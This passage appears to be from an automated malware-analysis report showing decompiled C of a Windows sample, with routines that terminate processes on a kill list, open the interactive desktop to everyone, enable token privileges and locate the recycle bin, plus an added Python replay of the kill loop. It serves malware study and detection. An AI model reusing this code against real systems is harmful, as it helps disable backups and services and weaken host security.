                                                                                         				} while (_t46 != 0);
                                                                                         				return RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                         			}

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00404895
                                                                                        • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400), ref: 004048AA
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000400), ref: 004048CD
                                                                                        • NtOpenProcess.NTDLL(004090AB,00000001,?,?), ref: 00404954
                                                                                        • NtTerminateProcess.NTDLL(004090AB,00000000), ref: 00404963
                                                                                        • NtClose.NTDLL(004090AB), ref: 0040496C
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00404984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                         • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateProcess$CloseFreeInformationOpenQuerySystemTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2409702202-0
                                                                                        • Opcode ID: c237992f1ae81465338ccbc1534799c31967e5f99c2b722e03e45203d16c2f6e
                                                                                        • Instruction ID: 4ec7f60314bf77e7cd7c60aae2a05b8257771ca246b27cf7c6daa19baa7ad9ee
                                                                                        • Opcode Fuzzy Hash: c237992f1ae81465338ccbc1534799c31967e5f99c2b722e03e45203d16c2f6e
                                                                                        • Instruction Fuzzy Hash: A53160B6900208FFDF219F90DD45B9EBB78FB44314F2080B6E600B61A0D7765A59DF98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
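The process-termination loop of E00404878, replayed in Python as an added example (this is not code from the sample or from the report). The SYSTEM_PROCESS_INFORMATION buffer is constructed inline with the 32-bit offsets the function reads (+0x00 NextEntryOffset, +0x38 ImageName, +0x44 UniqueProcessId), NtQuerySystemInformation is stood in by a function that reports STATUS_INFO_LENGTH_MISMATCH with the required size until the buffer is large enough, and the kill-list check E00404993 is replaced by a hypothetical name set, since its table is not on the page. The buffer base address, the process list, the 0xB8-byte fixed-part size and the case-insensitive comparison are all assumptions of the example.

```python
import struct

# Offsets inside a 32-bit SYSTEM_PROCESS_INFORMATION entry, the ones E00404878 reads.
OFF_NEXT_ENTRY = 0x00   # NextEntryOffset; 0 marks the last entry
OFF_IMAGE_NAME = 0x38   # UNICODE_STRING ImageName: Length, MaximumLength, Buffer (Buffer at +0x3c)
OFF_PROCESS_ID = 0x44   # UniqueProcessId, copied into CLIENT_ID for NtOpenProcess
FIXED_PART_SIZE = 0xb8  # fixed header size in the 32-bit layout (assumed); the name is placed after it

STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004

BASE = 0x00120000  # hypothetical address of the heap buffer; Buffer fields hold absolute pointers

# Hypothetical kill-list standing in for E00404993, whose table is not on the page.
KILL_LIST = {"sql.exe", "backup.exe", "vss.exe"}

# Constructed process list: pid 0 has no image name, like the idle process.
SAMPLE_PROCESSES = [
    (0, ""), (4, "System"), (500, "svchost.exe"), (600, "lsass.exe"),
    (1234, "explorer.exe"), (2048, "SQL.exe"), (3000, "backup.exe"),
]


def build_snapshot(processes, base=BASE):
    """Build a constructed SYSTEM_PROCESS_INFORMATION chain (32-bit layout)."""
    out = bytearray()
    for i, (pid, name) in enumerate(processes):
        name_bytes = name.encode("utf-16-le") + b"\x00\x00" if name else b""
        entry_len = (FIXED_PART_SIZE + len(name_bytes) + 7) & ~7  # keep entries 8-byte aligned
        entry = bytearray(entry_len)
        is_last = i == len(processes) - 1
        struct.pack_into("<I", entry, OFF_NEXT_ENTRY, 0 if is_last else entry_len)
        struct.pack_into("<I", entry, OFF_PROCESS_ID, pid)
        if name:
            buf_addr = base + len(out) + FIXED_PART_SIZE  # absolute pointer to the name
            struct.pack_into("<HHI", entry, OFF_IMAGE_NAME,
                             len(name_bytes) - 2, len(name_bytes), buf_addr)
            entry[FIXED_PART_SIZE:FIXED_PART_SIZE + len(name_bytes)] = name_bytes
        out += entry
    return bytes(out)


def nt_query_system_information(snapshot, buffer_size):
    """Stand-in for NtQuerySystemInformation(SystemProcessInformation, ...):
    returns (status, data, return_length), reporting STATUS_INFO_LENGTH_MISMATCH
    and the required size when the caller's buffer is too small."""
    if buffer_size < len(snapshot):
        return STATUS_INFO_LENGTH_MISMATCH, b"", len(snapshot)
    return STATUS_SUCCESS, snapshot, len(snapshot)


def read_image_name(data, entry_off, base=BASE):
    """Resolve ImageName the way the sample does: a NULL Buffer means 'no name'."""
    length, _max_length, buf = struct.unpack_from("<HHI", data, entry_off + OFF_IMAGE_NAME)
    if buf == 0:
        return None
    start = buf - base
    return data[start:start + length].decode("utf-16-le")


def select_targets(snapshot, kill_list=KILL_LIST, base=BASE):
    """Replay E00404878: grow the buffer on 0xC0000004, then walk the chain and
    return the (pid, name) pairs the sample would open with PROCESS_TERMINATE,
    plus the number of query attempts it took."""
    size, attempts = 0x400, 0  # the sample starts with a 0x400-byte heap block
    while True:
        attempts += 1
        status, data, size = nt_query_system_information(snapshot, size)
        if status == STATUS_SUCCESS:
            break
        if status != STATUS_INFO_LENGTH_MISMATCH:
            return [], attempts  # the sample frees the buffer and gives up
        # mismatch: RtlReAllocateHeap to the returned size and retry
    targets = []
    off = 0
    while True:
        next_off = struct.unpack_from("<I", data, off + OFF_NEXT_ENTRY)[0]
        name = read_image_name(data, off, base)
        # case-insensitive match is an assumption; E00404993's comparison is not shown
        if name is not None and name.lower() in kill_list:
            pid = struct.unpack_from("<I", data, off + OFF_PROCESS_ID)[0]
            targets.append((pid, name))
        if next_off == 0:
            break
        off += next_off
    return targets, attempts


if __name__ == "__main__":
    hits, tries = select_targets(build_snapshot(SAMPLE_PROCESSES))
    print(tries, hits)
```

With the constructed list the snapshot exceeds 0x400 bytes, so the first query fails with STATUS_INFO_LENGTH_MISMATCH and the second succeeds; the walk then yields only the two kill-list matches, and the idle-process entry with a NULL name buffer is skipped exactly as the `+0x3c != 0` test does.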

                                                                                        C-Code - Quality: 100%
                                                                                         			E0040318A() {
                                                                                         				long _v8;
                                                                                         				struct HWINSTA__* _v12;
                                                                                         				struct HDESK__* _v16;
                                                                                         				short _v32;
                                                                                         				short _v48;
                                                                                         				char _v148;
                                                                                         				intOrPtr* _t43;
                                                                                         				intOrPtr* _t44;
                                                                                         				struct _GUID _t57;
                                                                                         
                                                                                         				_t43 =  &_v32;
                                                                                         				 *_t43 = 0x690057;                        // L"WinSta0", built in place on the stack
                                                                                         				 *((intOrPtr*)(_t43 + 4)) = 0x53006e;
                                                                                         				 *((intOrPtr*)(_t43 + 8)) = 0x610074;
                                                                                         				 *((intOrPtr*)(_t43 + 0xc)) = 0x30;
                                                                                         				_t44 =  &_v48;
                                                                                         				 *_t44 = 0x650044;                        // L"Default"
                                                                                         				 *((intOrPtr*)(_t44 + 4)) = 0x610066;
                                                                                         				 *((intOrPtr*)(_t44 + 8)) = 0x6c0075;
                                                                                         				 *((intOrPtr*)(_t44 + 0xc)) = 0x74;
                                                                                         				// Hand-built absolute-form SECURITY_DESCRIPTOR (100 bytes) with its ACL at +0x28.
                                                                                         				_t57 =  &_v148;
                                                                                         				memset(_t57, 0, 0x64);
                                                                                         				 *_t57 = 1;                                   // Revision = 1
                                                                                         				 *((intOrPtr*)(_t57 + 0x28)) = 0x3c0002;      // ACL: AclRevision 2, AclSize 0x3c
                                                                                         				 *((intOrPtr*)(_t57 + 0x2c)) = 1;             // ACL: AceCount 1
                                                                                         				 *((intOrPtr*)(_t57 + 0x30)) = 0x140000;      // ACE: ACCESS_ALLOWED_ACE_TYPE, AceSize 0x14
                                                                                         				 *((intOrPtr*)(_t57 + 0x34)) = 0x10000000;    // ACE: Mask = GENERIC_ALL
                                                                                         				 *((intOrPtr*)(_t57 + 0x38)) = 0x101;         // SID: revision 1, one sub-authority ...
                                                                                         				 *((intOrPtr*)(_t57 + 0x3c)) = 0x1000000;     // ... authority 1, sub-authority 0: S-1-1-0 (Everyone)
                                                                                         				// E004016D2 is presumably an OS-version helper: 0x3e (62) reads as 6.2 if it encodes
                                                                                         				// major*10+minor, the first version where app-package SIDs exist.
                                                                                         				if(E004016D2() >= 0x3e) {
                                                                                         					 *((intOrPtr*)(_t57 + 0x2c)) = 2;             // ACL: AceCount 2
                                                                                         					 *((intOrPtr*)(_t57 + 0x44)) = 0x180000;      // ACE: ACCESS_ALLOWED_ACE_TYPE, AceSize 0x18
                                                                                         					 *((intOrPtr*)(_t57 + 0x48)) = 0x10000000;    // ACE: Mask = GENERIC_ALL
                                                                                         					 *((intOrPtr*)(_t57 + 0x4c)) = 0x201;         // SID: revision 1, two sub-authorities ...
                                                                                         					 *((intOrPtr*)(_t57 + 0x50)) = 0xf000000;     // ... authority 15 (app package authority)
                                                                                         					 *((intOrPtr*)(_t57 + 0x54)) = 2;             // ... sub-authorities 2, 1:
                                                                                         					 *((intOrPtr*)(_t57 + 0x58)) = 1;             //     S-1-15-2-1 (ALL APPLICATION PACKAGES)
                                                                                         				}
                                                                                         				 *((short*)(_t57 + 2)) = 4;                   // Control = SE_DACL_PRESENT
                                                                                         				 *((intOrPtr*)(_t57 + 0x10)) = _t57 + 0x28;   // Dacl pointer
                                                                                         				_v8 = 0;
                                                                                         				_v12 = 0;
                                                                                         				_v16 = 0;
                                                                                         				// 0x40000 = WRITE_DAC; 4 = DACL_SECURITY_INFORMATION. The interactive window station
                                                                                         				// and its default desktop are opened only to replace their DACL with the one above.
                                                                                         				_v12 = OpenWindowStationW( &_v32, 0, 0x40000);
                                                                                         				if(_v12 != 0) {
                                                                                         					if(NtSetSecurityObject(_v12, 4, _t57) == 0) {
                                                                                         						// 0x40081 = WRITE_DAC | DESKTOP_WRITEOBJECTS | DESKTOP_READOBJECTS
                                                                                         						_v16 = OpenDesktopW( &_v48, 0, 0, 0x40081);
                                                                                         						if(_v16 != 0) {
                                                                                         							if(NtSetSecurityObject(_v16, 4, _t57) == 0) {
                                                                                         								_v8 = 1;   // success only when both DACLs were replaced
                                                                                         							}
                                                                                         						}
                                                                                         					}
                                                                                         				}
                                                                                         				if(_v16 != 0) {
                                                                                         					CloseDesktop(_v16);
                                                                                         				}
                                                                                         				if(_v12 != 0) {
                                                                                         					CloseWindowStation(_v12);
                                                                                         				}
                                                                                         				return _v8;
                                                                                         			}
                                                                                        APIs
                                                                                        • memset.NTDLL ref: 004031DF
                                                                                        • OpenWindowStationW.USER32(?,00000000,00040000), ref: 0040327F
                                                                                        • NtSetSecurityObject.NTDLL(00000000,00000004,?), ref: 00403296
                                                                                        • OpenDesktopW.USER32(?,00000000,00000000,00040081), ref: 004032AF
                                                                                        • CloseDesktop.USER32(00000000,?,?,00000000), ref: 004032E2
                                                                                        • CloseWindowStation.USER32(00000000,?,?,00000000), ref: 004032F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CloseDesktopOpenStationWindow$ObjectSecuritymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1804051820-0
                                                                                        • Opcode ID: 5b8868e912488fa295ccd887e7dd77f6af64cd584d6cb10ce062927d4210feee
                                                                                        • Instruction ID: 8f42192c281bcc17ce305c1db20c10bd6e17a55d0e5b1cfdd6cac66eb2108c57
                                                                                        • Opcode Fuzzy Hash: 5b8868e912488fa295ccd887e7dd77f6af64cd584d6cb10ce062927d4210feee
                                                                                        • Instruction Fuzzy Hash: AE410EB0900208EFEB10DF55D98DB997FB8FF04319F1081B9E9056B295D3BA9688CF59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00408249() {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				int _v16;
                                                                                        				int _v20;
                                                                                        				int _v24;
                                                                                        				short* _v28;
                                                                                        				short* _v32;
                                                                                        				char _v160;
                                                                                        				void* _t48;
                                                                                        
                                                                                        				_v28 = E00401D08(0x40ef82);
                                                                                        				_v32 = E00401D08(0x40effc);
                                                                                        				memset( &_v160, 0, 0x80);
                                                                                        				if(RegCreateKeyExW(0x80000002, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
                                                                                        					_v16 = 1;
                                                                                        					_v20 = 0x80;
                                                                                        					if(RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v160,  &_v20) == 0) {
                                                                                        						_t48 = E00401060( &_v160, _v20, 0);
                                                                                        						if(E00401D45( &_v160) != 0) {
                                                                                        							_t48 = E00401060( &_v160, _t43, 1);
                                                                                        						}
                                                                                        						_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x2a);
                                                                                        						if(_v8 != 0) {
                                                                                        							E0040116C(_t48, 0xa, _v8);
                                                                                        						}
                                                                                        					}
                                                                                        					NtClose(_v12);
                                                                                        				}
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v28);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        				return _v8;
                                                                                        			}
                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • memset.NTDLL ref: 0040827F
                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,0040F1F6,00000000,00000000,00000000,00020119,00000000,?,?,?,?,00000000), ref: 004082A5
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408ACB,00000000,00000001,?,00000080,?,?,00000000), ref: 004082D8
                                                                                        • NtClose.NTDLL(?), ref: 0040833D
                                                                                          • Part of subcall function 00401D45: RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
                                                                                          • Part of subcall function 00401D45: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
                                                                                          • Part of subcall function 00401D45: memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
                                                                                          • Part of subcall function 00401D45: NtClose.NTDLL(?), ref: 00401DF8
                                                                                          • Part of subcall function 00401D45: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
                                                                                        • RtlAllocateHeap.NTDLL(00000008,0000002A,?), ref: 00408320
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040F1F6), ref: 0040834E
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408ACB), ref: 0040835F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCloseCreateQueryValue$memcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 2663019618-0
                                                                                        • Opcode ID: 37b1e7a26de76420a26c1c05f40112fa04460ebfdba43d7db358e900db441a9c
                                                                                        • Instruction ID: d943c196a3c570d0850543c5f98d4913f7b2424a9b04244dcf19ba695f8b1b68
                                                                                        • Opcode Fuzzy Hash: 37b1e7a26de76420a26c1c05f40112fa04460ebfdba43d7db358e900db441a9c
                                                                                        • Instruction Fuzzy Hash: 15316E71E40208BBEB219BA1DD06FEEBB7CFB04701F104076F604B60E1DA756A588B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00408160() {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				int _v16;
                                                                                        				int _v20;
                                                                                        				int _v24;
                                                                                        				short* _v28;
                                                                                        				short* _v32;
                                                                                        				long _v160;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v28 = E00401D08(0x40ef82);
                                                                                        				_v32 = E00401D08(0x40efe0);
                                                                                        				if(RegCreateKeyExW(0x80000002, _v28, 0, 0, 0, 0x20119, 0,  &_v12,  &_v24) == 0) {
                                                                                        					_v16 = 1;
                                                                                        					_v20 = 0x80;
                                                                                        					if(RegQueryValueExW(_v12, _v32, 0,  &_v16,  &_v160,  &_v20) == 0) {
                                                                                        						_v8 = RtlAllocateHeap( *0x40f5d6, 8, _v20);
                                                                                        						if(_v8 != 0) {
                                                                                        							wcscpy(_v8,  &_v160);
                                                                                        						}
                                                                                        					}
                                                                                        					NtClose(_v12);
                                                                                        				}
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v28);
                                                                                        				RtlFreeHeap( *0x40f5d6, 0, _v32);
                                                                                        				return _v8;
                                                                                        			}
                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,0040EDCE,00000000,00000000,00000000,00020119,00000000,?,?,0040EFE0,0040EF82,?,00000000,?,?,00000000), ref: 004081AC
                                                                                        • RegQueryValueExW.ADVAPI32(?,00408416,00000000,00000001,?,00000080,?,00000000,?,?,00000000), ref: 004081DB
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000080), ref: 004081F0
                                                                                        • wcscpy.NTDLL ref: 00408209
                                                                                        • NtClose.NTDLL(?), ref: 00408215
                                                                                        • RtlFreeHeap.NTDLL(00000000,0040EDCE), ref: 00408226
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408416), ref: 00408237
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree$CloseCreateQueryValuewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3057291146-0
                                                                                        • Opcode ID: 5240ba0683cb618bbb201cce863153eb6707ef154bb6a119b20aed93760c9151
                                                                                        • Instruction ID: 7e96c7c701486afcc560675b8f1a08436bf5a0fcd1cf14c0b36be41fd08da956
                                                                                        • Opcode Fuzzy Hash: 5240ba0683cb618bbb201cce863153eb6707ef154bb6a119b20aed93760c9151
                                                                                        • Instruction Fuzzy Hash: C521EB72940209FFEB219FD1DE06FAEBB78FB04701F10407AF605B11A1DB752A199B58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 23%
                                                                                        			E00402160() {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				void* _v16;
                                                                                        				void* _t20;
                                                                                        				void* _t27;
                                                                                        				void* _t30;
                                                                                        				void* _t31;
                                                                                        
                                                                                        				_t20 =  *0x40f6e4(0xffffffff, 0x28,  &_v8);
                                                                                        				if(_t20 == 0) {
                                                                                        					 *0x40f6d0(_v8, 3,  &_v16, 4,  &_v12);
                                                                                        					_v16 = RtlAllocateHeap( *0x40f5d6, 8, _v12);
                                                                                        					if(_v16 == 0) {
                                                                                        						L9:
                                                                                        						return NtClose(_v8);
                                                                                        					}
                                                                                        					_t27 =  *0x40f6d0(_v8, 3, _v16, _v12,  &_v12);
                                                                                        					if(_t27 != 0) {
                                                                                        						L8:
                                                                                        						RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					_t31 = _v16;
                                                                                        					asm("lodsd");
                                                                                        					_t30 = _t27;
                                                                                        					do {
                                                                                        						if( *((intOrPtr*)(_t31 + 8)) != 3) {
                                                                                        							 *((intOrPtr*)(_t31 + 8)) = 3;
                                                                                        						}
                                                                                        						_t31 = _t31 + 0xc;
                                                                                        						_t30 = _t30 - 1;
                                                                                        					} while (_t30 != 0);
                                                                                        					 *0x40f6e8(_v8, 0, _v16, 0, 0, 0);
                                                                                        					goto L8;
                                                                                        				}
                                                                                        				return _t20;
                                                                                        			}

                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000028,0040905C), ref: 00402173
                                                                                        • NtQueryInformationToken.NTDLL(0040905C,00000003,?,00000004,?), ref: 00402190
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?), ref: 004021A1
                                                                                        • NtQueryInformationToken.NTDLL(0040905C,00000003,00000000,?,?), ref: 004021BF
                                                                                        • NtAdjustPrivilegesToken.NTDLL(0040905C,00000000,00000000,00000000,00000000,00000000), ref: 004021F2
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402203
                                                                                        • NtClose.NTDLL(0040905C), ref: 0040220C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Token$HeapInformationQuery$AdjustAllocateCloseFreeOpenPrivilegesProcess
                                                                                        • String ID:
                                                                                        • API String ID: 171759394-0
                                                                                        • Opcode ID: d6cc3f43a27decc4a072a415d9359db09a0b4e6609930ab19c7573de194aa27b
                                                                                        • Instruction ID: c79a791a82b3b0d9800e1b3040d21526624686fe0a1f1f536f66a104b832bba7
                                                                                        • Opcode Fuzzy Hash: d6cc3f43a27decc4a072a415d9359db09a0b4e6609930ab19c7573de194aa27b
                                                                                        • Instruction Fuzzy Hash: BD215836940208BFEB218B90ED09FAEBB79FB44711F1045B5F621B61F0D7721A49DB18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00403FBA(wchar_t* _a4, wchar_t* _a8) {
                                                                                        				union _FINDEX_INFO_LEVELS _v8;
                                                                                        				void* _v12;
                                                                                        				char _v32;
                                                                                        				short _v552;
                                                                                        				struct _WIN32_FIND_DATAW _v1144;
                                                                                        				wchar_t* _t28;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				wcscpy( &_v552, _a4);
                                                                                        				_t28 =  &_v32;
                                                                                        				 *_t28 = 0x72002a;
                                                                                        				_t28[1] = 0x630065;
                                                                                        				_t28[2] = 0x630079;
                                                                                        				_t28[3] = 0x65006c;
                                                                                        				_t28[4] = 0x2a;
                                                                                        				wcscat( &_v552, _t28);
                                                                                        				_v12 = FindFirstFileExW( &_v552, 0,  &_v1144, 0, 0, 0);
                                                                                        				if(_v12 != 0xffffffff) {
                                                                                        					while((_v1144.dwFileAttributes & 0x00000010) == 0) {
                                                                                        						if(FindNextFileW(_v12,  &_v1144) != 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						L4:
                                                                                        						FindClose(_v12);
                                                                                        						goto L5;
                                                                                        					}
                                                                                        					wcscpy(_a8, _a4);
                                                                                        					wcscat(_a8,  &(_v1144.cFileName));
                                                                                        					_v8 = 1;
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				L5:
                                                                                        				return _v8;
                                                                                        			}

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Find$Filewcscatwcscpy$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3302616064-0
                                                                                        • Opcode ID: 3db659683c7b999952af6ee28f553bf6215fb1bfafd81eec022c881602763db6
                                                                                        • Instruction ID: 04740b053a823cf9da96ab29fd9f7270a491be09eb208749cab9ea2bc689e4d1
                                                                                        • Opcode Fuzzy Hash: 3db659683c7b999952af6ee28f553bf6215fb1bfafd81eec022c881602763db6
                                                                                        • Instruction Fuzzy Hash: CC215EB1900108EFDB209F90ED08F99BBBCEB44315F1045B5EA08A61A1D7769A598F69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 79%
                                                                                        			E00405564() {
                                                                                        				signed int _v8;
                                                                                        				long _v12;
                                                                                        				void* _v16;
                                                                                        				long _v20;
                                                                                        				char _v32;
                                                                                        				long _t34;
                                                                                        				void* _t37;
                                                                                        				void* _t43;
                                                                                        				void* _t45;
                                                                                        				intOrPtr* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t50;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v20 = 0x400;
                                                                                        				_v16 = RtlAllocateHeap( *0x40f5d6, 0, _v20);
                                                                                        				while(1) {
                                                                                        					_t34 = NtQueryObject(0, 3, _v16, _v20,  &_v20);
                                                                                        					if(_t34 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t34 != 0xc0000004) {
                                                                                        						return RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        					} else {
                                                                                        						_v20 = _v20 + 0x28;
                                                                                        						_v16 = RtlReAllocateHeap( *0x40f5d6, 0, _v16, _v20);
                                                                                        						continue;
                                                                                        					}
                                                                                        					L16:
                                                                                        				}
                                                                                        				_t48 =  &_v32;
                                                                                        				 *_t48 = 0x690046;
                                                                                        				 *((intOrPtr*)(_t48 + 4)) = 0x65006c;
                                                                                        				 *(_t48 + 8) = 0;
                                                                                        				_t49 = _v16;
                                                                                        				asm("lodsd");
                                                                                        				_v12 = _t34;
                                                                                        				_t45 = 0;
                                                                                        				while(1) {
                                                                                        					_t37 =  *0x40f694( *((intOrPtr*)(_t49 + 4)), _t48);
                                                                                        					_t50 = _t50 + 8;
                                                                                        					if(_t37 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t49 = (( *(_t49 + 2) & 0x0000ffff) + 0x00000003 & 0xfffffffc) + _t49 + 0x60;
                                                                                        					_t45 = _t45 + 1;
                                                                                        					_v12 = _v12 - 1;
                                                                                        					if(_v12 != 0) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					L15:
                                                                                        					RtlFreeHeap( *0x40f5d6, 0, _v16);
                                                                                        					return _v8;
                                                                                        					goto L16;
                                                                                        				}
                                                                                        				_t43 = E004016D2();
                                                                                        				if(_t43 < 0x3f) {
                                                                                        					if(_t43 < 0x3d) {
                                                                                        						_v8 = _t45 + 1;
                                                                                        					} else {
                                                                                        						_v8 = _t45 + 2;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_v8 =  *(_t49 + 0x52) & 0x000000ff;
                                                                                        				}
                                                                                        				goto L15;
                                                                                        			}

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 00405588
                                                                                        • NtQueryObject.NTDLL(00000000,00000003,?,00000400,00000400), ref: 0040559F
                                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,00000028), ref: 004055C6
                                                                                        • _wcsicmp.NTDLL ref: 00405613
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040566B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Heap$Allocate$FreeObjectQuery_wcsicmp
